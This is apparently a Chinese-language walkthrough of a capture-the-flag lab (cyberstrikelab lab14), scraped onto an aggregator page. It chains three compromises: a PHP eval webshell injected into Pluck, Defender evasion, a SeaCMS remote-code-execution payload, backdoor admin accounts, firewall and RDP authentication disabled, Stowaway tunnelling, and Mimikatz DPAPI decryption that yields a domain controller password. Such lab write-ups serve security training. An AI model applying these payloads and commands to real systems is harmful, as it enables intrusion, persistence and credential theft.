当前位置: 首页 > news >正文

cyberstrikelab-lab14

flag1 pluck

后台弱密码 cslab

第一次打的时候任意文件上传上传不上去,怀疑是没配置好 temp 目录的权限,这里用另一个漏洞

先把报错的 album 模块删掉

抓包修改 cont2

cont2=';eval($_POST[x]);//

蚁剑连接 http://10.0.0.34/admin.php?module=blog

可以直接拿到 flag

tasklist 发现有 defender 用掩日分离上线 msf

assets/cyberstrikelab-lab14/image-20250929233226828.png

getsystem 提权

assets/cyberstrikelab-lab14/image-20250929233846569.png

shell 里添加用户

net user admin admin@123 /add

添加到管理员组

net localgroup Administrators mysql /add

开启 3389

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭防火墙

netsh advfirewall set allprofiles state off

关闭身份验证

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

3389 连接发现有双网卡,使用 stowaway 内网穿透

攻击机

windows_x64_admin.exe -c 10.0.0.34:6666

靶机

windows_x64_agent.exe -l 6666

flag2 seacms

fscan 扫出 seacms 漏洞

[+] PocScan http://10.5.8.88 poc-yaml-seacms-sqli
[+] PocScan http://10.5.8.88 poc-yaml-seacms-v654-rce

参考

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=({searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[x]))&x=system('whoami');

assets/cyberstrikelab-lab14/image-20250929235443464.png

system 权限,直接开 3389 上线

flag3 DC

在第二台机器中发现 rdp 凭据

dir /a C:\Users\Administrator\appdata\local\microsoft\credentials\*

使用 mimikatz 解密 rdp 凭据

记录文件名

assets/cyberstrikelab-lab14/image-20251002123604410.png

811292CB3B95926F7EA2D46FEB2A7ADB

找 guidMasterKey

mimikatz.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\811292CB3B95926F7EA2D46FEB2A7ADB" "exit"

assets/cyberstrikelab-lab14/image-20250930001343134.png

{2e550db8-ab33-407c-8a29-120d38c9d711}

找到对应 guidMasterKey 对应的 masterkey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" "exit"

assets/cyberstrikelab-lab14/image-20250930001429218.png

24b089facc24b9f698931a52411c777ed146efe5f0248fd0d4b1844f1d441b9970ad86c006627e49b0e8c94179f0b4a8f509f9d8af5af3569faa21d9c56068a9

解密

mimikatz.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\811292CB3B95926F7EA2D46FEB2A7ADB /masterkey:24b089facc24b9f698931a52411c777ed146efe5f0248fd0d4b1844f1d441b9970ad86c006627e49b0e8c94179f0b4a8f509f9d8af5af3569faa21d9c56068a9" "exit"

assets/cyberstrikelab-lab14/image-20250930001529749.png

得到 DC 密码 cs1ab@qs

3389 连接即可

http://www.sczhlp.com/news/157080/

相关文章:

  • 使用虚幻引擎(UE5)制作开箱爆金币功能 - 详解
  • 太平洋电脑网官方网站在线教育网站建设
  • 福州营销型网站建设价格做外账经常进哪几个网站
  • 郑州网站改版广东网站备案要多久
  • 免费建立网站好用的软件营销型网站建设与网盟
  • 广东省公路建设公司网站wordpress插件 数据库
  • 网站设计的公司怎么样成都网站设计师
  • 双桥区网站制作h5响应式网站技术
  • 上海建设网站公营销咨询顾问
  • 网站管理的主要工作有哪些网站模版上线需要什么
  • 网站设计怎么自学手机网站开源模板
  • 济南专门做网站的公司先建设网站后付款
  • WordPress搭建社区网站网站建设公司济南
  • 网站建设uuiop绍兴网站制作多少钱
  • 网站的关键词在哪里设置制作二维码的软件
  • 网站建设 中企动力成都有没有网站找人帮忙做图
  • 外贸led网站建设网页设计的工作流程
  • dede电影网站响应式网站背景
  • 西安网站优化招聘网培训机构老师何去何从
  • 做装修网站价格电商平台运营是做什么
  • 长沙官网网站推广优化房屋装修在线设计网站
  • php学建网站企业网站优化工具
  • 网站外链怎么发布百度站长工具验证
  • 建设多语种网站涿州做网站
  • 兰州网站建设兰州用虚拟机做网站的心得体会
  • 网站图片优化百度移动端排名
  • 网站开发的常见编程语言有哪些网站外链价格
  • 深入解析:[linux仓库]深入解析Linux动态链接与动态库加载:理解背后的原理与技巧
  • AI行业应用:金融、医疗、教育、制造业的落地实践与技术创新 - 实践
  • 页面做的比较炫酷的网站网站背景 手机显示不全